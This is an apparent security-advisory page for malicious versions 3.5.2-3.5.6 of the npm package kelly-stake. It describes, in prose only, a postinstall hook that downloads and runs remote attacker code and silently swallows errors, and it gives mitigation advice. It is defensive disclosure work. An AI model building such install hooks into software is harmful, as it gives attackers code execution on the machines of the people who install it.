MAL-2026-6482: Malicious code in kelly-stake (npm)
The kelly-stake npm package versions 3.5.2 through 3.5.6 contain malicious code that executes arbitrary commands on the consumer's machine during installation. The postinstall script downloads and runs unverified remote code from an attacker-controlled domain, enabling remote code execution without user awareness. This behavior allows the attacker to rotate payloads dynamically without republishing the package. The installation process suppresses errors to avoid detection, ensuring the malicious code runs on every installation.
AI Analysis
Technical Summary
The kelly-stake npm package includes a postinstall hook script (scripts/install-check.cjs) that performs a two-stage remote code execution attack. Upon npm install, it fetches a JSON configuration from an attacker-controlled URL, extracts a URL to a malicious tarball, downloads and extracts it, runs npm install inside the extracted directory, then requires and executes a function from the malicious module. The remote payload URL is unpinned and unverified, allowing the attacker to change the payload at will without republishing the package. Errors during this process are caught and downgraded to warnings, ensuring the install succeeds silently while executing arbitrary attacker code.
Potential Impact
This vulnerability results in arbitrary code execution on the machine of anyone installing the affected versions of the kelly-stake package. Attackers can execute any commands with the privileges of the user running npm install, potentially leading to full system compromise, data theft, or further malware deployment. The attack is stealthy due to error suppression and dynamic payload delivery.
Mitigation Recommendations
No official patch or fix is currently documented for this vulnerability. Users should immediately cease using the affected versions of the kelly-stake package (3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6). Avoid installing or updating to these versions. Monitor vendor advisories for any forthcoming official fixes or guidance. Consider auditing your environment for signs of compromise if these versions were installed.
MAL-2026-6482: Malicious code in kelly-stake (npm)
Description
The kelly-stake npm package versions 3.5.2 through 3.5.6 contain malicious code that executes arbitrary commands on the consumer's machine during installation. The postinstall script downloads and runs unverified remote code from an attacker-controlled domain, enabling remote code execution without user awareness. This behavior allows the attacker to rotate payloads dynamically without republishing the package. The installation process suppresses errors to avoid detection, ensuring the malicious code runs on every installation.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The kelly-stake npm package includes a postinstall hook script (scripts/install-check.cjs) that performs a two-stage remote code execution attack. Upon npm install, it fetches a JSON configuration from an attacker-controlled URL, extracts a URL to a malicious tarball, downloads and extracts it, runs npm install inside the extracted directory, then requires and executes a function from the malicious module. The remote payload URL is unpinned and unverified, allowing the attacker to change the payload at will without republishing the package. Errors during this process are caught and downgraded to warnings, ensuring the install succeeds silently while executing arbitrary attacker code.
Potential Impact
This vulnerability results in arbitrary code execution on the machine of anyone installing the affected versions of the kelly-stake package. Attackers can execute any commands with the privileges of the user running npm install, potentially leading to full system compromise, data theft, or further malware deployment. The attack is stealthy due to error suppression and dynamic payload delivery.
Mitigation Recommendations
No official patch or fix is currently documented for this vulnerability. Users should immediately cease using the affected versions of the kelly-stake package (3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6). Avoid installing or updating to these versions. Monitor vendor advisories for any forthcoming official fixes or guidance. Consider auditing your environment for signs of compromise if these versions were installed.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6482
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["npm"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a3ef7de27e9c7971902640a
Added to database: 06/26/2026, 22:06:22 UTC
Last enriched: 06/26/2026, 22:41:40 UTC
Last updated: 06/26/2026, 23:04:43 UTC
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.